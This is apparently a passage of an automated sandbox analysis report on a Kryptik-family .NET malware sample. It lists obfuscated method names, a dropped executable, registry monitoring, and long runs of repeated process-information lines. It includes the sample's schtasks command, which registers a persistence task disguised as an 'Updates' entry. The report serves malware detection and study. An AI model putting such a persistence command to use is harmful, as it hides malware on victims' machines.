Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, c35RxChhngPqAk42Vr.cs	High entropy of concatenated method names: 'fbmnBwxr9x', 'xUbnqNpN7q', 'ukfneCeKEO', 'LqOnKlJQ8k', 'w6DnHnMngQ', 'EVlnLuGCxJ', 'agVnO4rLVX', 'YcE7hifMQK', 'tCJ7amwGxX', 'RN87xQ0awb'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, RBoRtSQu7sDQrMTu3r.cs	High entropy of concatenated method names: 'kEiOjHY6bj', 'vc8OHpHZoG', 'WtxOL18Md0', 'RUYOsag94X', 'q2cO3x3vCO', 'UYXLom85jr', 'vDQL4PO2hT', 'C5CLhChjvr', 'GuNLa8lbYw', 'cpXLxVooMk'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, Pc2Bo6lEd4fR2c4BCe.cs	High entropy of concatenated method names: 'Dispose', 'CSQBxqKsWH', 'f1iVXck80l', 'V5M66Wy9ct', 'ib7BvWUWsI', 'F5hBzgT4Fp', 'ProcessDialogKey', 'IIWVFnPhSb', 'jkSVBEkrn8', 'XZSVV9MsFS'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, sL9ieooCXKnduqu9K7v.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QnltIyLQBF', 'XRAtM1Frap', 'CNst98DlaE', 'wMFtWbbTp1', 't2EtoLh9hp', 'kP0t4g6tLF', 'hDythlwYhZ'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, TjrqVw3PJQ3Sx8WHOJ.cs	High entropy of concatenated method names: 'ETJNMG6yZ', 'ppBmtpmIh', 'udTCPHIBy', 'xhhpA14RQ', 'rnTDsAPym', 'wvLRFUt3M', 'ibR8sMgLKa5KE1DOEg', 'yCdsmO1HgxTgnHa1AP', 'Chh7dswof', 'P5etyU6GP'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, YwRA9L1WpLER8u0VFY.cs	High entropy of concatenated method names: 'xwZGEed6D4', 'lT6G13Jxli', 'aInGIbDHT1', 'VYvGMsoMX2', 'tDRGX2nX8o', 'aPrGfsCdue', 'jAcGUNadEk', 'yW5Gy463gO', 'NpqGAtW9qE', 'GFmGbJ9QG0'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, e4NXZjNjHV5vmgvMPk.cs	High entropy of concatenated method names: 'NQfqjYYItI', 'bSHqKbercY', 'smbqHp1OGE', 'iFuqucVW1G', 'EAxqL0mDR5', 'L9MqOBoo0F', 'gS5qsfjqoF', 'q8Uq3kM9aX', 'TawqkDhVXe', 'clGqYypCHe'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, VsXexiPwgkdpkYOIjb.cs	High entropy of concatenated method names: 'l0HJQHnmHw', 'z5xJDg1xyO', 'u2UJZxk3ea', 'NS6JX7AFVt', 'GERJUGvTCU', 'z3IJyU159l', 'PDVJbr1b07', 'zxdJ0u25j3', 'q3hJEy52iQ', 'QZGJTSD5ai'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, bH4LmEktTbgyfu1nmW.cs	High entropy of concatenated method names: 'uY07K3Soa1', 'fUc7HVm16k', 'bKB7u9fMTv', 'PhB7LHxi21', 'dDx7Of7lpG', 'zRO7sM2DO2', 'wIZ73MBd7G', 'XdI7kcPpTh', 'ieK7YjtuTI', 'Y7c7cRjFtP'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, dnVFUnFdWwv7se0265.cs	High entropy of concatenated method names: 'VgWumxXTHq', 'dTNuC724Eb', 'ogquQkF662', 'jhxuDbMsVI', 'onauGqT5Q7', 'uV3u8DLOfF', 'VLMuPpbuwY', 'sQlu7auoOr', 'LyCunWRm3B', 'wvautPo0Ef'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, khmUE4uXWX2TkVb03Y.cs	High entropy of concatenated method names: 'ToString', 'Ls68Tg32Yh', 'Fsr8Xjt0vi', 'g6d8f1FuKC', 'iK08U3hCI6', 'PTt8ymY2Vl', 'n4S8ABTI4T', 'zic8bIHa3A', 'CBi807uIxp', 'nj08SLdBb8'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, J7KEIN8ETF49kcU0Zj.cs	High entropy of concatenated method names: 'a2SBs9u0iD', 'uBoB3xPJjJ', 'DVsBYB7Q7s', 'of7Bcqu0jL', 'X9iBGOEkw4', 'qEKB8hljHK', 'Oran9tTESkTQ162TIk', 'fdNKdplnQCHcmbY9HP', 'pqpBBTSYhD', 'NfrBqHoBtS'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, PnSHUJG13oNu5hJSUf.cs	High entropy of concatenated method names: 'bM4L2mwR3t', 'LXMLpM0xMl', 'q0AufFeork', 'qgMuUSLmxw', 'AO4uyjAfJk', 'XZKuARgrhm', 'ni7ubNT1y6', 'bs0u0pCOk9', 'ok0uSccUjk', 'WaGuEOfm0h'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, kNQSvGzjja851KY6JG.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hm4nJjUnyZ', 'oIGnGJeknw', 'cvZn8qqbPQ', 'nDNnPGQYx7', 'Vy7n7G3Wbj', 'USAnn7KgDd', 'DClnt5vriC'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, m0Q6g3tGVDoEV2HkJB.cs	High entropy of concatenated method names: 'V0EPalLMRw', 'rIXPvwwMXm', 'TkH7Fiac9X', 'JGv7BQRgOZ', 'ze3PTc1WwK', 'WrrP1dGMI6', 'OG6PwfQS7K', 'OU9PIb1StU', 'VNNPMCEBwu', 'VFlP9h9iJv'
Source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.379a470.1.raw.unpack, audrBvVO2OopYIUgn9.cs	High entropy of concatenated method names: 'na0sd0QW37', 'kBHsr1JyR9', 'IQasNRy2RM', 'Y47smF98c0', 'uqCs2lRhOu', 'FtCsCR9rKh', 'bPdsppBNGu', 'PaAsQsRYGh', 'rvKsDOwipy', 'kPmsRrKp9b'

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

File created: C:\Users\user\AppData\Roaming\eFzAvsOm.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFzAvsOm" /XML "C:\Users\user\AppData\Local\Temp\tmp9A0C.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\eFzAvsOm.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
